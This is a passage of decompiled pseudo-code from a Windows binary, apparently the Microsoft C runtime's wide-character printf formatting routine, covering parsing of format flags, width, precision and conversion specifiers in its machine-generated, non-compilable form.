													_t502 =  *(_t525 - 0x454) & 0x0000ffff;
													 *((intOrPtr*)(_t525 + 0xc)) =  *((intOrPtr*)(_t525 + 0xc)) + 2;
													if(( *(_t525 - 0x454) & 0x0000ffff) == 0 ||  *(_t525 - 0x44c) < 0) {
														break;
													} else {
														if(( *(_t525 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t525 - 0x454) & 0x0000ffff) > 0x78) {
															 *(_t525 - 0x4d8) = 0;
														} else {
															 *(_t525 - 0x4d8) =  *(( *(_t525 - 0x454) & 0x0000ffff) + L"h != _T(\'\\0\'))") & 0xf;
														}
													}
													L7:
													 *(_t525 - 0x450) =  *(_t525 - 0x4d8);
													_t519 =  *(_t525 - 0x450) * 9;
													_t490 =  *(_t525 - 0x45c);
													_t510 = ( *(_t519 + _t490 + 0x4081a0) & 0x000000ff) >> 4;
													 *(_t525 - 0x45c) = ( *(_t519 + _t490 + 0x4081a0) & 0x000000ff) >> 4;
													if( *(_t525 - 0x45c) != 8) {
														L16:
														 *(_t525 - 0x4e0) =  *(_t525 - 0x45c);
														__eflags =  *(_t525 - 0x4e0) - 7;
														if( *(_t525 - 0x4e0) > 7) {
															continue;
														}
														L17:
														switch( *((intOrPtr*)( *(_t525 - 0x4e0) * 4 +  &M00423E24))) {
															case 0:
																L18:
																 *(_t525 - 0xc) = 1;
																E00423F30( *(_t525 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t525 + 8)), _t525 - 0x44c);
																_t527 = _t527 + 0xc;
																goto L214;
															case 1:
																L19:
																 *(__ebp - 0x2c) = 0;
																__ecx =  *(__ebp - 0x2c);
																 *(__ebp - 0x28) = __ecx;
																__edx =  *(__ebp - 0x28);
																 *(__ebp - 0x18) =  *(__ebp - 0x28);
																__eax =  *(__ebp - 0x18);
																 *(__ebp - 0x1c) =  *(__ebp - 0x18);
																 *(__ebp - 0x10) = 0;
																 *(__ebp - 0x30) = 0xffffffff;
																 *(__ebp - 0xc) = 0;
																goto L214;
															case 2:
																L20:
																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																 *(__ebp - 0x4e4) = __ecx;
																 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																__eflags =  *(__ebp - 0x4e4) - 0x10;
																if( *(__ebp - 0x4e4) > 0x10) {
																	goto L27;
																}
																L21:
																_t57 =  *(__ebp - 0x4e4) + 0x423e5c; // 0x498d04
																__ecx =  *_t57 & 0x000000ff;
																switch( *((intOrPtr*)(__ecx * 4 +  &M00423E44))) {
																	case 0:
																		goto L24;
																	case 1:
																		goto L25;
																	case 2:
																		goto L23;
																	case 3:
																		goto L22;
																	case 4:
																		goto L26;
																	case 5:
																		goto L27;
																}
															case 3:
																L28:
																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
																if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																	__edx =  *(__ebp - 0x18);
																	__edx =  *(__ebp - 0x18) * 0xa;
																	__eflags = __edx;
																	_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																	__ecx = __edx + _t81;
																	 *(__ebp - 0x18) = __ecx;
																} else {
																	__edx = __ebp + 0x14;
																	 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																	__eflags =  *(__ebp - 0x18);
																	if( *(__ebp - 0x18) < 0) {
																		__eax =  *(__ebp - 0x10);
																		__eax =  *(__ebp - 0x10) | 0x00000004;
																		__eflags = __eax;
																		 *(__ebp - 0x10) = __eax;
																		__ecx =  *(__ebp - 0x18);
																		__ecx =  ~( *(__ebp - 0x18));
																		 *(__ebp - 0x18) = __ecx;
																	}
																}
																L33:
																goto L214;
															case 4:
																L34:
																 *(__ebp - 0x30) = 0;
																goto L214;
															case 5:
																L35:
																__edx =  *(__ebp - 0x454) & 0x0000ffff;
																__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
																if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																	__ecx =  *(__ebp - 0x30);
																	__ecx =  *(__ebp - 0x30) * 0xa;
																	__eflags = __ecx;
																	_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																	__eax = __ecx + _t92;
																	 *(__ebp - 0x30) = __ecx + _t92;
																} else {
																	__eax = __ebp + 0x14;
																	 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																	__eflags =  *(__ebp - 0x30);
																	if( *(__ebp - 0x30) < 0) {
																		 *(__ebp - 0x30) = 0xffffffff;
																	}
																}
																goto L214;
															case 6:
																L41:
																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																 *(__ebp - 0x4e8) = __ecx;
																 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																__eflags =  *(__ebp - 0x4e8) - 0x2e;
																if( *(__ebp - 0x4e8) > 0x2e) {
																	L64:
																	goto L214;
																}
																L42:
																_t100 =  *(__ebp - 0x4e8) + 0x423e84; // 0x36919003
																__ecx =  *_t100 & 0x000000ff;
																switch( *((intOrPtr*)(__ecx * 4 +  &M00423E70))) {
																	case 0:
																		L47:
																		__ecx =  *(__ebp + 0xc);
																		__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
																			L50:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
																				L53:
																				__ecx =  *(__ebp + 0xc);
																				__edx =  *__ecx & 0x0000ffff;
																				__eflags = ( *__ecx & 0x0000ffff) - 0x64;
																				if(( *__ecx & 0x0000ffff) == 0x64) {
																					L59:
																					L61:
																					goto L64;
																				}
																				L54:
																				__eax =  *(__ebp + 0xc);
																				__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																				__eflags = __ecx - 0x69;
																				if(__ecx == 0x69) {
																					goto L59;
																				}
																				L55:
																				__edx =  *(__ebp + 0xc);
																				__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
																					goto L59;
																				}
																				L56:
																				__ecx =  *(__ebp + 0xc);
																				__edx =  *__ecx & 0x0000ffff;
																				__eflags = ( *__ecx & 0x0000ffff) - 0x75;
																				if(( *__ecx & 0x0000ffff) == 0x75) {
																					goto L59;
																				}
																				L57:
																				__eax =  *(__ebp + 0xc);
																				__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																				__eflags = __ecx - 0x78;
																				if(__ecx == 0x78) {
																					goto L59;
																				}
																				L58:
																				__edx =  *(__ebp + 0xc);
																				__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
																					 *(__ebp - 0x45c) = 0;
																					goto L18;
																				}
																				goto L59;
																			}
																			L51:
																			__eax =  *(__ebp + 0xc);
																			__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																			__eflags = __ecx - 0x32;
																			if(__ecx != 0x32) {
																				goto L53;
																			} else {
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																				goto L61;
																			}
																		}
																		L48:
																		__eax =  *(__ebp + 0xc);
																		__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																		__eflags = __ecx - 0x34;
																		if(__ecx != 0x34) {
																			goto L50;
																		} else {
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																			goto L61;
																		}
																	case 1:
																		L62:
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) | 0x00000020;
																		 *(__ebp - 0x10) = __ecx;
																		goto L64;
																	case 2:
																		L43:
																		__edx =  *(__ebp + 0xc);
																		__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
																			__eax =  *(__ebp - 0x10);
																			__eax =  *(__ebp - 0x10) | 0x00000010;
																			__eflags = __eax;
																			 *(__ebp - 0x10) = __eax;
																		} else {
																			__ecx =  *(__ebp + 0xc);
																			__ecx =  *(__ebp + 0xc) + 2;
																			 *(__ebp + 0xc) = __ecx;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																		}
																		goto L64;
																	case 3:
																		L63:
																		__edx =  *(__ebp - 0x10);
																		__edx =  *(__ebp - 0x10) | 0x00000800;
																		__eflags = __edx;
																		 *(__ebp - 0x10) = __edx;
																		goto L64;
																	case 4:
																		goto L64;
																}
															case 7:
																L65:
																__eax =  *(__ebp - 0x454) & 0x0000ffff;
																 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
																__ecx =  *(__ebp - 0x4ec);
																__ecx =  *(__ebp - 0x4ec) - 0x41;
																 *(__ebp - 0x4ec) = __ecx;
																__eflags =  *(__ebp - 0x4ec) - 0x37;
																if( *(__ebp - 0x4ec) > 0x37) {
																	while(1) {
																		L187:
																		__eflags =  *(__ebp - 0x28);
																		if( *(__ebp - 0x28) != 0) {
																			goto L212;
																		}
																		goto L188;
																	}
																}
																L66:
																_t141 =  *(__ebp - 0x4ec) + 0x423ef0; // 0xcccccc0d
																__eax =  *_t141 & 0x000000ff;
																switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00423EB4))) {
																	case 0:
																		L120:
																		 *(__ebp - 0x2c) = 1;
																		 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																		__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																		 *(__ebp - 0x454) = __ax;
																		goto L121;
																	case 1:
																		L67:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																		__eflags =  *(__ebp - 0x10) & 0x00000830;
																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																			__edx =  *(__ebp - 0x10);
																			__edx =  *(__ebp - 0x10) | 0x00000020;
																			__eflags = __edx;
																			 *(__ebp - 0x10) = __edx;
																		}
																		goto L69;
																	case 2:
																		L82:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																		__eflags =  *(__ebp - 0x10) & 0x00000830;
																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) | 0x00000020;
																			__eflags = __ecx;
																			 *(__ebp - 0x10) = __ecx;
																		}
																		goto L84;
																	case 3:
																		L144:
																		 *(__ebp - 0x460) = 7;
																		L145:
																		 *(__ebp - 8) = 0x10;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																		__eflags =  *(__ebp - 0x10) & 0x00000080;
																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																			__edx = 0x30;
																			 *(__ebp - 0x14) = __dx;
																			 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
																			__eflags =  *(__ebp - 0x460) + 0x51;
																			 *(__ebp - 0x12) = __ax;
																			 *(__ebp - 0x1c) = 2;
																		}
																		goto L150;
																	case 4:
																		L75:
																		__eax = __ebp + 0x14;
																		 *(__ebp - 0x474) = E0041F270(__ebp + 0x14);
																		__eflags =  *(__ebp - 0x474);
																		if( *(__ebp - 0x474) == 0) {
																			L77:
																			__edx =  *0x4bc060; // 0x408114
																			 *(__ebp - 4) = __edx;
																			__eax =  *(__ebp - 4);
																			 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																			L81:
																			goto L187;
																		}
																		L76:
																		__ecx =  *(__ebp - 0x474);
																		__eflags =  *(__ecx + 4);
																		if( *(__ecx + 4) != 0) {
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																			__eflags =  *(__ebp - 0x10) & 0x00000800;
																			if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																				 *(__ebp - 0xc) = 0;
																				__edx =  *(__ebp - 0x474);
																				__eax =  *(__edx + 4);
																				 *(__ebp - 4) =  *(__edx + 4);
																				__ecx =  *(__ebp - 0x474);
																				__edx =  *__ecx;
																				 *(__ebp - 0x24) =  *__ecx;
																			} else {
																				__edx =  *(__ebp - 0x474);
																				__eax =  *(__edx + 4);
																				 *(__ebp - 4) =  *(__edx + 4);
																				__ecx =  *(__ebp - 0x474);
																				__eax =  *__ecx;
																				asm("cdq");
																				 *__ecx - __edx =  *__ecx - __edx >> 1;
																				 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																				 *(__ebp - 0xc) = 1;
																			}
																			goto L81;
																		}
																		goto L77;
																	case 5:
																		L121:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		__edx = __ebp - 0x448;
																		 *(__ebp - 4) = __ebp - 0x448;
																		 *(__ebp - 0x44) = 0x200;
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) >= 0) {
																			L123:
																			__eflags =  *(__ebp - 0x30);
																			if( *(__ebp - 0x30) != 0) {
																				L126:
																				__eflags =  *(__ebp - 0x30) - 0x200;
																				if( *(__ebp - 0x30) > 0x200) {
																					 *(__ebp - 0x30) = 0x200;
																				}
																				L128:
																				__eflags =  *(__ebp - 0x30) - 0xa3;
																				if( *(__ebp - 0x30) > 0xa3) {
																					__ecx =  *(__ebp - 0x30);
																					__ecx =  *(__ebp - 0x30) + 0x15d;
																					 *(__ebp - 0x20) = L0040E5B0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																					__eflags =  *(__ebp - 0x20);
																					if( *(__ebp - 0x20) == 0) {
																						 *(__ebp - 0x30) = 0xa3;
																					} else {
																						__edx =  *(__ebp - 0x20);
																						 *(__ebp - 4) =  *(__ebp - 0x20);
																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																						 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																					}
																				}
																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																				__edx =  *(__ebp + 0x14);
																				__eax =  *(__edx - 8);
																				__ecx =  *(__edx - 4);
																				 *(__ebp - 0x490) =  *(__edx - 8);
																				 *(__ebp - 0x48c) =  *(__edx - 4);
																				__ecx = __ebp - 0x40;
																				_push(E004103A0(__ebp - 0x40));
																				__edx =  *(__ebp - 0x2c);
																				_push( *(__ebp - 0x2c));
																				__eax =  *(__ebp - 0x30);
																				_push( *(__ebp - 0x30));
																				__ecx =  *(__ebp - 0x454);
																				_push( *(__ebp - 0x454));
																				__edx =  *(__ebp - 0x44);
																				_push( *(__ebp - 0x44));
																				__eax =  *(__ebp - 4);
																				_push( *(__ebp - 4));
																				__ecx = __ebp - 0x490;
																				_push(__ebp - 0x490);
																				__edx =  *0x4bb808; // 0x776010b9
																				E00411D00(__edx) =  *__eax();
																				__esp = __esp + 0x1c;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																				__eflags =  *(__ebp - 0x10) & 0x00000080;
																				if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																					__eflags =  *(__ebp - 0x30);
																					if( *(__ebp - 0x30) == 0) {
																						__ecx = __ebp - 0x40;
																						_push(E004103A0(__ebp - 0x40));
																						__ecx =  *(__ebp - 4);
																						_push( *(__ebp - 4));
																						__edx =  *0x4bb814; // 0x776010b9
																						E00411D00(__edx) =  *__eax();
																						__esp = __esp + 8;
																					}
																				}
																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
																				__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
																				if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																					__eflags =  *(__ebp - 0x10) & 0x00000080;
																					if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																						__ecx = __ebp - 0x40;
																						_push(E004103A0(__ebp - 0x40));
																						__edx =  *(__ebp - 4);
																						_push( *(__ebp - 4));
																						__eax =  *0x4bb810; // 0x776010b9
																						__eax =  *__eax();
																						__esp = __esp + 8;
																					}
																				}
																				__ecx =  *(__ebp - 4);
																				__edx =  *( *(__ebp - 4));
																				__eflags =  *( *(__ebp - 4)) - 0x2d;
																				if( *( *(__ebp - 4)) == 0x2d) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																					__ecx =  *(__ebp - 4);
																					__ecx =  *(__ebp - 4) + 1;
																					__eflags = __ecx;
																					 *(__ebp - 4) = __ecx;
																				}
																				__edx =  *(__ebp - 4);
																				 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																				do {
																					L187:
																					__eflags =  *(__ebp - 0x28);
																					if( *(__ebp - 0x28) != 0) {
																						goto L212;
																					}
																					goto L188;
																				} while ( *(__ebp - 0x4ec) > 0x37);
																				goto L66;
																			}
																			L124:
																			__eax =  *(__ebp - 0x454) & 0x0000ffff;
																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
																			if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
																				goto L126;
																			}
																			L125:
																			 *(__ebp - 0x30) = 1;
																			goto L128;
																		}
																		L122:
																		 *(__ebp - 0x30) = 6;
																		goto L128;
																	case 6:
																		L69:
																		 *(__ebp - 0xc) = 1;
																		__ebp + 0x14 = E0041F270(__ebp + 0x14);
																		 *(__ebp - 0x458) = __ax;
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) & 0x00000020;
																		__eflags = __ecx;
																		if(__ecx == 0) {
																			__cx =  *(__ebp - 0x458);
																			 *(__ebp - 0x448) = __cx;
																		} else {
																			 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
																			 *(__ebp - 0x470) = __dl;
																			 *((char*)(__ebp - 0x46f)) = 0;
																			__ecx = __ebp - 0x40;
																			__eax = E004103A0(__ebp - 0x40);
																			__ecx = __ebp - 0x40;
																			E004103A0(__ebp - 0x40) =  *__eax;
																			__ecx =  *(__ebp - 0x448 + 0xac);
																			__edx = __ebp - 0x470;
																			__eax = __ebp - 0x448;
																			__eax = E00420B60(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
																			__eflags = __eax;
																			if(__eax < 0) {
																				 *(__ebp - 0x28) = 1;
																			}
																		}
																		__edx = __ebp - 0x448;
																		 *(__ebp - 4) = __ebp - 0x448;
																		 *(__ebp - 0x24) = 1;
																		while(1) {
																			L187:
																			__eflags =  *(__ebp - 0x28);
																			if( *(__ebp - 0x28) != 0) {
																				goto L212;
																			}
																			goto L188;
																		}
																	case 7:
																		L141:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																		 *(__ebp - 8) = 0xa;
																		L150:
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																		__eflags =  *(__ebp - 0x10) & 0x00008000;
																		if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																			__eflags =  *(__ebp - 0x10) & 0x00001000;
																			if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																				__eflags =  *(__ebp - 0x10) & 0x00000020;
																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																					__eflags =  *(__ebp - 0x10) & 0x00000040;
																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																						__ecx = __ebp + 0x14;
																						__eax = E0041F270(__ebp + 0x14);
																						__edx = 0;
																						__eflags = 0;
																						 *(__ebp - 0x4a0) = __eax;
																						 *(__ebp - 0x49c) = 0;
																					} else {
																						__eax = __ebp + 0x14;
																						__eax = E0041F270(__ebp + 0x14);
																						asm("cdq");
																						 *(__ebp - 0x4a0) = __eax;
																						 *(__ebp - 0x49c) = __edx;
																					}
																				} else {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																					__eflags =  *(__ebp - 0x10) & 0x00000040;
																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																						__ecx = __ebp + 0x14;
																						E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																						asm("cdq");
																						 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
																						 *(__ebp - 0x49c) = __edx;
																					} else {
																						__eax = __ebp + 0x14;
																						__eax = E0041F270(__ebp + 0x14);
																						__ax = __eax;
																						asm("cdq");
																						 *(__ebp - 0x4a0) = __eax;
																						 *(__ebp - 0x49c) = __edx;
																					}
																				}
																			} else {
																				__eax = __ebp + 0x14;
																				 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
																				 *(__ebp - 0x49c) = __edx;
																			}
																		} else {
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
																			 *(__ebp - 0x49c) = __edx;
																		}
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																		__eflags =  *(__ebp - 0x10) & 0x00000040;
																		if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																			goto L167;
																		}
																	case 8:
																		L106:
																		__eax = __ebp + 0x14;
																		 *(__ebp - 0x484) = E0041F270(__ebp + 0x14);
																		__eax = E00424120();
																		__eflags = __eax;
																		if(__eax != 0) {
																			L116:
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) & 0x00000020;
																			__eflags = __ecx;
																			if(__ecx == 0) {
																				__ecx =  *(__ebp - 0x484);
																				__edx =  *(__ebp - 0x44c);
																				 *__ecx =  *(__ebp - 0x44c);
																			} else {
																				__edx =  *(__ebp - 0x484);
																				__ax =  *(__ebp - 0x44c);
																				 *( *(__ebp - 0x484)) = __ax;
																			}
																			 *(__ebp - 0x28) = 1;
																			while(1) {
																				L187:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L212;
																				}
																				goto L188;
																			}
																		}
																		L107:
																		__ecx = 0;
																		__eflags = 0;
																		if(0 == 0) {
																			 *(__ebp - 0x4f4) = 0;
																		} else {
																			 *(__ebp - 0x4f4) = 1;
																		}
																		__edx =  *(__ebp - 0x4f4);
																		 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
																		__eflags =  *(__ebp - 0x488);
																		if( *(__ebp - 0x488) == 0) {
																			_push(L"(\"\'n\' format specifier disabled\", 0)");
																			_push(0);
																			_push(0x695);
																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																			_push(2);
																			__eax = L0040C820();
																			__esp = __esp + 0x14;
																			__eflags = __eax - 1;
																			if(__eax == 1) {
																				asm("int3");
																			}
																		}
																		__eflags =  *(__ebp - 0x488);
																		if( *(__ebp - 0x488) != 0) {
																			L115:
																			while(1) {
																				L187:
																				__eflags =  *(__ebp - 0x28);
																				if( *(__ebp - 0x28) != 0) {
																					goto L212;
																				}
																				goto L188;
																			}
																		} else {
																			L114:
																			 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																			__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																			 *(__ebp - 0x4cc) = 0xffffffff;
																			__ecx = __ebp - 0x40;
																			__eax = E00410370(__ecx);
																			__eax =  *(__ebp - 0x4cc);
																			goto L225;
																		}
																	case 9:
																		L148:
																		 *(__ebp - 8) = 8;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																		__eflags =  *(__ebp - 0x10) & 0x00000080;
																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																			__edx =  *(__ebp - 0x10);
																			__edx =  *(__ebp - 0x10) | 0x00000200;
																			__eflags = __edx;
																			 *(__ebp - 0x10) = __edx;
																		}
																		while(1) {
																			L150:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
																			__eflags =  *(__ebp - 0x10) & 0x00008000;
																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																				__eflags =  *(__ebp - 0x10) & 0x00001000;
																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																					__eflags =  *(__ebp - 0x10) & 0x00000020;
																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__edx = 0;
																							__eflags = 0;
																							 *(__ebp - 0x4a0) = __eax;
																							 *(__ebp - 0x49c) = 0;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							asm("cdq");
																							 *(__ebp - 0x4a0) = __eax;
																							 *(__ebp - 0x49c) = __edx;
																						}
																					} else {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																							asm("cdq");
																							 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
																							 *(__ebp - 0x49c) = __edx;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__ax = __eax;
																							asm("cdq");
																							 *(__ebp - 0x4a0) = __eax;
																							 *(__ebp - 0x49c) = __edx;
																						}
																					}
																				} else {
																					__eax = __ebp + 0x14;
																					 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
																					 *(__ebp - 0x49c) = __edx;
																				}
																			} else {
																				__ecx = __ebp + 0x14;
																				 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
																				 *(__ebp - 0x49c) = __edx;
																			}
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																			__eflags =  *(__ebp - 0x10) & 0x00000040;
																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																				goto L167;
																			}
																			goto L163;
																		}
																	case 0xa:
																		L143:
																		 *(__ebp - 0x30) = 8;
																		goto L144;
																	case 0xb:
																		L84:
																		__eflags =  *(__ebp - 0x30) - 0xffffffff;
																		if( *(__ebp - 0x30) != 0xffffffff) {
																			__edx =  *(__ebp - 0x30);
																			 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
																		} else {
																			 *(__ebp - 0x4f0) = 0x7fffffff;
																		}
																		__eax =  *(__ebp - 0x4f0);
																		 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
																		__ecx = __ebp + 0x14;
																		 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																		__eflags =  *(__ebp - 0x10) & 0x00000020;
																		if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																			L98:
																			__eflags =  *(__ebp - 4);
																			if( *(__ebp - 4) == 0) {
																				__ecx =  *0x4bc064; // 0x408104
																				 *(__ebp - 4) = __ecx;
																			}
																			 *(__ebp - 0xc) = 1;
																			__edx =  *(__ebp - 4);
																			 *(__ebp - 0x480) =  *(__ebp - 4);
																			while(1) {
																				L101:
																				__eax =  *(__ebp - 0x47c);
																				__ecx =  *(__ebp - 0x47c);
																				__ecx =  *(__ebp - 0x47c) - 1;
																				 *(__ebp - 0x47c) = __ecx;
																				__eflags =  *(__ebp - 0x47c);
																				if( *(__ebp - 0x47c) == 0) {
																					break;
																				}
																				L102:
																				__edx =  *(__ebp - 0x480);
																				__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
																				__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
																				if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
																					break;
																				}
																				L103:
																				 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
